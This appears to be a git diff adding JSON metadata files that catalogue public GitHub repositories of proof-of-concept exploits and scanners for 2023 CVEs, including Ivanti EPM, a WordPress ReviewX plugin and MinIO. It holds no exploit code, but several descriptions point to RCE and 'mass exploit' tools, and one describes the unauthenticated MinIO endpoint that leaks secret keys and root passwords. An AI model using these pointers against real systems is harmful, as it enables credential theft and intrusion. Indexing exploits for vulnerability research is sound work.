"https:\/\/avatars.githubusercontent.com\/u\/192593040?v=4", + "html_url": "https:\/\/github.com\/CrazyDaveX86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrazyDaveX86\/CVE-2023-28293", + "description": "Exploit for CVE-2023-28293 ", + "fork": false, + "created_at": "2024-12-23T10:25:37Z", + "updated_at": "2024-12-23T10:26:57Z", + "pushed_at": "2024-12-23T10:26:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28324.json b/2023/CVE-2023-28324.json new file mode 100644 index 0000000000..a6cf5e87ce --- /dev/null +++ b/2023/CVE-2023-28324.json @@ -0,0 +1,33 @@ +[ + { + "id": 856944203, + "name": "CVE-2023-28324", + "full_name": "horizon3ai\/CVE-2023-28324", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-28324", + "description": "Ivanti EPM AgentPortal RCE Vulnerability", + "fork": false, + "created_at": "2024-09-13T14:02:04Z", + "updated_at": "2024-11-26T23:19:45Z", + "pushed_at": "2024-09-16T14:24:20Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28329.json b/2023/CVE-2023-28329.json new file mode 100644 index 0000000000..72c5bda576 --- /dev/null +++ b/2023/CVE-2023-28329.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569754, + "name": "CVE-2023-28329", + "full_name": "cli-ish\/CVE-2023-28329", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28329", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:04Z", + "updated_at": "2023-10-18T07:58:05Z", + "pushed_at": "2023-10-18T07:58:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2833.json b/2023/CVE-2023-2833.json new file mode 100644 index 0000000000..033cc1a9a0 --- /dev/null +++ b/2023/CVE-2023-2833.json @@ -0,0 +1,33 @@ +[ + { + "id": 655914171, + "name": "CVE-2023-2833", + "full_name": "Alucard0x1\/CVE-2023-2833", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2023-2833", + "description": "Mass Exploit Privileges Authentication (Subscriber to Administrator) - Wordpress Plugin ReviewX ", + "fork": false, + "created_at": "2023-06-19T22:10:09Z", + "updated_at": "2023-07-07T14:35:35Z", + "pushed_at": "2023-06-19T22:46:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28330.json b/2023/CVE-2023-28330.json new file mode 100644 index 0000000000..2f62b98f23 --- /dev/null +++ b/2023/CVE-2023-28330.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569827, + "name": "CVE-2023-28330", + "full_name": "cli-ish\/CVE-2023-28330", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28330", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:16Z", + "updated_at": "2023-10-18T07:58:16Z", + "pushed_at": "2023-10-18T07:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28343.json b/2023/CVE-2023-28343.json new file mode 100644 index 0000000000..71ba874a48 --- /dev/null +++ b/2023/CVE-2023-28343.json @@ -0,0 +1,95 @@ +[ + { + "id": 616937181, + "name": "CVE-2023-28343", + "full_name": "gobysec\/CVE-2023-28343", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-28343", + "description": "Altenergy Power System Control Software set_timezone RCE Vulnerability (CVE-2023-28343)", + "fork": false, + "created_at": "2023-03-21T11:41:36Z", + "updated_at": "2024-01-02T10:32:19Z", + "pushed_at": "2023-03-22T04:26:17Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618014056, + "name": "CVE-2023-28343", + "full_name": "superzerosec\/CVE-2023-28343", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2023-28343", + "description": "CVE-2023-28343 POC exploit", + "fork": false, + "created_at": "2023-03-23T15:19:02Z", + "updated_at": "2023-07-03T18:51:31Z", + "pushed_at": "2023-03-23T15:23:13Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 661672662, + "name": "CVE-2023-28343", + "full_name": "hba343434\/CVE-2023-28343", + "owner": { + "login": "hba343434", + "id": 120598843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120598843?v=4", + "html_url": "https:\/\/github.com\/hba343434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hba343434\/CVE-2023-28343", + "description": "CVE-2023-28343", + "fork": false, + "created_at": "2023-07-03T11:48:21Z", + "updated_at": "2024-10-23T13:08:05Z", + "pushed_at": "2023-07-03T11:50:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28354.json b/2023/CVE-2023-28354.json new file mode 100644 index 0000000000..9339f44b34 --- /dev/null +++ b/2023/CVE-2023-28354.json @@ -0,0 +1,33 @@ +[ + { + "id": 891574745, + "name": "CVE-2023-28354", + "full_name": "stormfleet\/CVE-2023-28354", + "owner": { + "login": "stormfleet", + "id": 48259298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48259298?v=4", + "html_url": "https:\/\/github.com\/stormfleet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stormfleet\/CVE-2023-28354", + "description": "CVE-2023-28354", + "fork": false, + "created_at": "2024-11-20T15:19:32Z", + "updated_at": "2024-11-25T10:33:55Z", + "pushed_at": "2024-11-25T10:33:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28432.json b/2023/CVE-2023-28432.json new file mode 100644 index 0000000000..e02f18b6ec --- /dev/null +++ b/2023/CVE-2023-28432.json @@ -0,0 +1,594 @@ +[ + { + "id": 617997824, + "name": "CVE-2023-28432", + "full_name": "Mr-xn\/CVE-2023-28432", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-28432", + "description": "CVE-2023-28434 nuclei templates", + "fork": false, + "created_at": "2023-03-23T14:44:24Z", + "updated_at": "2025-01-03T14:32:47Z", + "pushed_at": "2023-03-23T15:53:05Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "info-leak", + "minio" + ], + "visibility": "public", + "forks": 8, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618043888, + "name": "CVE-2023-28432", + "full_name": "gobysec\/CVE-2023-28432", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-28432", + "description": "MiniO verify interface sensitive information disclosure vulnerability (CVE-2023-28432) ", + "fork": false, + "created_at": "2023-03-23T16:27:47Z", + "updated_at": "2024-07-16T01:07:38Z", + "pushed_at": "2023-03-24T02:27:36Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618239295, + "name": "minio_unauth_check", + "full_name": "Okaytc\/minio_unauth_check", + "owner": { + "login": "Okaytc", + "id": 50813688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813688?v=4", + "html_url": "https:\/\/github.com\/Okaytc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Okaytc\/minio_unauth_check", + "description": "CVE-2023-28432,minio未授权访问检测工具", + "fork": false, + "created_at": "2023-03-24T03:15:28Z", + "updated_at": "2023-06-28T07:25:42Z", + "pushed_at": "2023-03-24T06:31:37Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618321930, + "name": "CVE-2023-28432", + "full_name": "MzzdToT\/CVE-2023-28432", + "owner": { + "login": "MzzdToT", + "id": 44486276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44486276?v=4", + "html_url": "https:\/\/github.com\/MzzdToT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MzzdToT\/CVE-2023-28432", + "description": "MinIO敏感信息泄露漏洞批量扫描poc&exp", + "fork": false, + "created_at": "2023-03-24T08:13:34Z", + "updated_at": "2024-12-20T08:10:58Z", + "pushed_at": "2023-03-24T08:19:42Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618327066, + "name": "CVE-2023-28432", + "full_name": "acheiii\/CVE-2023-28432", + "owner": { + "login": "acheiii", + "id": 48488540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48488540?v=4", + "html_url": "https:\/\/github.com\/acheiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acheiii\/CVE-2023-28432", + "description": "CVE-2023-28432 POC", + "fork": false, + "created_at": "2023-03-24T08:27:32Z", + "updated_at": "2024-12-18T06:10:00Z", + "pushed_at": "2023-03-24T08:53:49Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619455026, + "name": "Cve-2023-28432-", + "full_name": "steponeerror\/Cve-2023-28432-", + "owner": { + "login": "steponeerror", + "id": 60814302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60814302?v=4", + "html_url": "https:\/\/github.com\/steponeerror", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/steponeerror\/Cve-2023-28432-", + "description": "通过vulhub的复现过程实现了,基本的批量检测。比较垃圾但是勉强能用", + "fork": false, + "created_at": "2023-03-27T07:14:06Z", + "updated_at": "2023-05-17T07:40:44Z", + "pushed_at": "2023-03-27T07:17:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 620587865, + "name": "CVE-2023-28432", + "full_name": "Cuerz\/CVE-2023-28432", + "owner": { + "login": "Cuerz", + "id": 84277976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84277976?v=4", + "html_url": "https:\/\/github.com\/Cuerz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cuerz\/CVE-2023-28432", + "description": "CVE-2023-28432 MinIO敏感信息泄露检测脚本", + "fork": false, + "created_at": "2023-03-29T01:26:30Z", + "updated_at": "2024-12-12T06:51:44Z", + "pushed_at": "2023-03-29T01:40:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624418578, + "name": "Minio-CVE-2023-28432", + "full_name": "LHXHL\/Minio-CVE-2023-28432", + "owner": { + "login": "LHXHL", + "id": 44888589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44888589?v=4", + "html_url": "https:\/\/github.com\/LHXHL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LHXHL\/Minio-CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2023-04-06T12:29:31Z", + "updated_at": "2023-08-23T02:00:24Z", + "pushed_at": "2023-04-06T12:52:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625670330, + "name": "CVE-2023-28432_docker", + "full_name": "h0ng10\/CVE-2023-28432_docker", + "owner": { + "login": "h0ng10", + "id": 1886150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1886150?v=4", + "html_url": "https:\/\/github.com\/h0ng10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h0ng10\/CVE-2023-28432_docker", + "description": "Test environments for CVE-2023-28432, information disclosure in MinIO clusters", + "fork": false, + "created_at": "2023-04-09T20:28:33Z", + "updated_at": "2023-04-09T20:28:33Z", + "pushed_at": "2023-04-10T04:18:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627328650, + "name": "MinIO_CVE-2023-28432_EXP", + "full_name": "CHINA-china\/MinIO_CVE-2023-28432_EXP", + "owner": { + "login": "CHINA-china", + "id": 92798047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92798047?v=4", + "html_url": "https:\/\/github.com\/CHINA-china", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CHINA-china\/MinIO_CVE-2023-28432_EXP", + "description": null, + "fork": false, + "created_at": "2023-04-13T08:36:52Z", + "updated_at": "2023-04-13T08:39:15Z", + "pushed_at": "2023-04-13T08:50:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646183182, + "name": "CVE-2023-28432-metasploit-scanner", + "full_name": "TaroballzChen\/CVE-2023-28432-metasploit-scanner", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2023-28432-metasploit-scanner", + "description": "MinIO Information Disclosure Vulnerability scanner by metasploit", + "fork": false, + "created_at": "2023-05-27T14:55:07Z", + "updated_at": "2023-08-06T21:43:54Z", + "pushed_at": "2023-05-27T15:35:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 681035124, + "name": "CVE-2023-28432", + "full_name": "bingtangbanli\/CVE-2023-28432", + "owner": { + "login": "bingtangbanli", + "id": 77956516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4", + "html_url": "https:\/\/github.com\/bingtangbanli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bingtangbanli\/CVE-2023-28432", + "description": "CVE-2023-28432检测工具", + "fork": false, + "created_at": "2023-08-21T06:03:25Z", + "updated_at": "2023-08-28T03:20:30Z", + "pushed_at": "2023-08-26T15:30:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687511506, + "name": "CVE-2023-28432", + "full_name": "Chocapikk\/CVE-2023-28432", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-28432", + "description": "Automated vulnerability scanner for CVE-2023-28432 in Minio deployments, revealing sensitive environment variables.", + "fork": false, + "created_at": "2023-09-05T14:01:53Z", + "updated_at": "2024-08-12T20:32:41Z", + "pushed_at": "2023-09-05T14:02:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 707634565, + "name": "CVE-2023-28432", + "full_name": "yTxZx\/CVE-2023-28432", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yTxZx\/CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2023-10-20T10:20:10Z", + "updated_at": "2024-01-12T02:54:35Z", + "pushed_at": "2023-10-20T10:26:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723777809, + "name": "CVE-2023-28432-minio_update_rce", + "full_name": "unam4\/CVE-2023-28432-minio_update_rce", + "owner": { + "login": "unam4", + "id": 66824584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66824584?v=4", + "html_url": "https:\/\/github.com\/unam4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unam4\/CVE-2023-28432-minio_update_rce", + "description": "https:\/\/github.com\/AbelChe\/evil_minio\/tree\/main 打包留存", + "fork": false, + "created_at": "2023-11-26T18:23:33Z", + "updated_at": "2024-09-06T07:00:17Z", + "pushed_at": "2023-11-26T18:36:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728488310, + "name": "CVE-2023-28432", + "full_name": "C1ph3rX13\/CVE-2023-28432", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-28432", + "description": "CVE-2023-28432 Minio Information isclosure Exploit", + "fork": false, + "created_at": "2023-12-07T03:33:37Z", + "updated_at": "2023-12-07T19:37:00Z", + "pushed_at": "2023-12-25T09:41:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740067240, + "name": "CVE-2023-28432", + "full_name": "netuseradministrator\/CVE-2023-28432", + "owner": { + "login": "netuseradministrator", + "id": 96680088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96680088?v=4", + "html_url": "https:\/\/github.com\/netuseradministrator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netuseradministrator\/CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2024-01-07T12:34:49Z", + "updated_at": "2024-01-31T02:25:36Z", + "pushed_at": "2024-01-07T15:20:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741968176, + "name": "CVE-2023-28432", + "full_name": "xk-mt\/CVE-2023-28432", + "owner": { + "login": "xk-mt", + "id": 77874955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77874955?v=4", + "html_url": "https:\/\/github.com\/xk-mt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xk-mt\/CVE-2023-28432", + "description": "minio系统存在信息泄露漏洞,未经身份认证的远程攻击,通过发送特殊POST请求到\/minio\/bootstrap\/v1\/verify即可获取所有敏感信息,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可能导致管理员账号密码泄露。", + "fork": false, + "created_at": "2024-01-11T13:41:20Z", + "updated_at": "2024-01-11T14:56:48Z", + "pushed_at": "2024-01-15T08:35:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786121269, + "name": "CVE-2023-28432", + "full_name": "0xRulez\/CVE-2023-28432", + "owner": { + "login": "0xRulez", + "id": 103935434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103935434?v=4", + "html_url": "https:\/\/github.com\/0xRulez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRulez\/CVE-2023-28432", + "description": "MinIO vulnerability exploit - CVE-2023-28432", + "fork": false, + "created_at": "2024-04-13T13:52:43Z", + "updated_at": "2024-07-05T02:54:45Z", + "pushed_at": "2024-04-13T13:56:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28434.json b/2023/CVE-2023-28434.json new file mode 100644 index 0000000000..75b9fd4a84 --- /dev/null +++ b/2023/CVE-2023-28434.json @@ -0,0 +1,36 @@ +[ + { + "id": 619494083, + "name": "evil_minio", + "full_name": "AbelChe\/evil_minio", + "owner": { + "login": "AbelChe", + "id": 40518242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40518242?v=4", + "html_url": "https:\/\/github.com\/AbelChe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbelChe\/evil_minio", + "description": "EXP for CVE-2023-28434 MinIO unauthorized to RCE", + "fork": false, + "created_at": "2023-03-27T08:53:04Z", + "updated_at": "2025-01-05T17:25:07Z", + "pushed_at": "2023-04-04T05:26:59Z", + "stargazers_count": 308, + "watchers_count": 308, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28434", + "minio" + ], + "visibility": "public", + "forks": 38, + "watchers": 308, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28447.json b/2023/CVE-2023-28447.json new file mode 100644 index 0000000000..3e3b12e724 --- /dev/null +++ b/2023/CVE-2023-28447.json @@ -0,0 +1,33 @@ +[ + { + "id": 621271126, + "name": "lblfixer_cve_2023_28447", + "full_name": "drkbcn\/lblfixer_cve_2023_28447", + "owner": { + "login": "drkbcn", + "id": 2090227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2090227?v=4", + "html_url": "https:\/\/github.com\/drkbcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drkbcn\/lblfixer_cve_2023_28447", + "description": "Module for PrestaShop 1.7.X to fix CVE-2023-28447 vulnerability (Smarty XSS)", + "fork": false, + "created_at": "2023-03-30T10:28:20Z", + "updated_at": "2024-06-17T10:32:48Z", + "pushed_at": "2023-03-30T10:32:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28467.json b/2023/CVE-2023-28467.json new file mode 100644 index 0000000000..4a437dc2e3 --- /dev/null +++ b/2023/CVE-2023-28467.json @@ -0,0 +1,33 @@ +[ + { + "id": 669606296, + "name": "CVE-2023-28467", + "full_name": "ahmetaltuntas\/CVE-2023-28467", + "owner": { + "login": "ahmetaltuntas", + "id": 12846006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12846006?v=4", + "html_url": "https:\/\/github.com\/ahmetaltuntas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetaltuntas\/CVE-2023-28467", + "description": null, + "fork": false, + "created_at": "2023-07-22T20:37:15Z", + "updated_at": "2023-11-17T00:57:47Z", + "pushed_at": "2023-07-22T21:06:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28588.json b/2023/CVE-2023-28588.json new file mode 100644 index 0000000000..51c68a5924 --- /dev/null +++ b/2023/CVE-2023-28588.json @@ -0,0 +1,188 @@ +[ + { + "id": 742448622, + "name": "CVE-2023-28588", + "full_name": "uthrasri\/CVE-2023-28588", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588", + "description": null, + "fork": false, + "created_at": "2024-01-12T13:59:34Z", + "updated_at": "2024-01-12T14:02:22Z", + "pushed_at": "2024-01-19T10:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742454957, + "name": "CVE-2023-28588", + "full_name": "Trinadh465\/CVE-2023-28588", + "owner": { + "login": 